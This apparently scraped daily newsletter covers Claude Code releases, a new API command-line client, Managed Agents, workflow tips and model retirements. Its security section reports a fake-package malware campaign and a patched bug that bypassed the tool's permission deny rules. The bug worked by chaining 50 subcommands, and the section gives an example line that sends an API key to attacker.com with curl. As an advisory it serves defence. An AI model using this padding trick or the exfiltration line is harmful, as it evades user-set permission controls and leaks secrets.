Claude Code Daily Briefing - 2026-04-20

Release Summary

VersionDateKey Changes
v2.1.1144/18Fixed crash in permission dialog when agent teams teammate requested tool permission

(No new releases as of 4/20 — latest version is v2.1.114 from 4/18.)

Full Release Notes


New Features & Practical Usage

ant CLI — Official Command-Line Client for the Claude API

Anthropic has launched ant, an official CLI for interacting with the Claude API directly from your terminal. Built in Go, it replaces verbose curl + JSON workflows with typed flags and YAML support.

Key features:

# Install
go install 'github.com/anthropics/anthropic-cli/cmd/ant@latest'

# Basic usage
ant messages create \
  --model claude-opus-4-7 \
  --max-tokens 1024 \
  --message '{role: user, content: "Hello, Claude"}'

Ideal for prompt prototyping, API debugging, and CI/CD integrations. Set ANTHROPIC_API_KEY and you’re ready to go.

GitHub | API Docs

Claude Managed Agents Public Beta — Fully Managed Agent Harness

Anthropic has launched Claude Managed Agents in public beta. This is a fully managed harness for running Claude as an autonomous agent with secure sandboxing, built-in tools, and Server-Sent Events (SSE) streaming.

Unlike the local Claude Code CLI, Managed Agents runs on Anthropic’s infrastructure — no server setup required. While Routines handles schedule-based automation within Claude Code, Managed Agents provides programmatic, API-level agent execution for production integrations.

Anthropic


Developer Workflow Tips

The Value of “Coding by Hand” in the AI Era

A developer at Brooklyn’s Recurse Center is spending three months coding without any LLM assistance. The experience, shared on Substack, earned 15 points on GeekNews.

Key insights:

If you use Claude Code daily, periodically carving out “manual coding” time may help maintain long-term technical depth.

Substack

Top 3 Claude Code + Figma Workflows

UX Planet published a practical guide covering three essential workflows connecting Claude Code with Figma:

  1. Read design systems via Figma MCP: Claude Code reads Figma files directly — components, variables, and tokens reflected in code
  2. Code-to-design conversion: Capture production/localhost UI and convert to editable Figma frames
  3. Bidirectional sync: Edit in Figma → reflect in code via Claude Code → publish back to Figma
# Connect Figma MCP server
claude mcp add figma

This structurally eliminates the “design-code mismatch” in designer-developer handoffs. Combined with Claude Design’s “Claude Code handoff bundle” export, the entire design→prototype→production pipeline becomes connected.

UX Planet


Security & Limitations

Fake Claude Code Packages Distributing Malware — Trend Micro Warning

Trend Micro has issued warnings about an active malware campaign using the Claude Code source leak (3/31) as bait.

Attack methods:

Scale: 838 stars, 1,060 forks, and 533+ confirmed payload downloads from a single identified account. This campaign has been active since February 2026, impersonating 25+ software brands.

Mitigation: Only install Claude Code via the official npm package (npm install -g @anthropic-ai/claude-code) or Homebrew. Treat any unofficial repository claiming to contain “leaked source code” as suspicious.

Trend Micro | Trend Micro — Weaponizing Trust

Deny-Rule Bypass via 50-Subcommand Padding

A detailed analysis of a high-severity vulnerability in Claude Code’s Bash tool permission system has been published, showing how all user-configured deny rules could be bypassed.

Technical details:

# Example: "deny": ["Bash(curl:*)"] is bypassed:
true && true && ... (50x) ... && curl https://attacker.com/steal?key=$API_KEY

Fix: Patched in v2.1.90. Users on earlier versions should update immediately. The security hardening in v2.1.113 (wrapper command detection, find -exec denial) provides additional defense against this class of attacks.

CybersecurityNews | Adversa.ai


Ecosystem & Plugins

Claude Haiku 3 Officially Retired (4/19)

Claude Haiku 3 (claude-3-haiku-20240307) has been officially retired as of April 19. Following the earlier retirement of Sonnet 3.7 and Haiku 3.5, this marks the final stage of Claude 3.x generation model deprecations. Migration to Haiku 4.5 (claude-haiku-4-5-20251001) is required.

If you’ve set ANTHROPIC_SMALL_FAST_MODEL to Haiku 3 in Claude Code, update your configuration.


Community News


Minor Changes Worth Knowing



Interesting Projects & Tools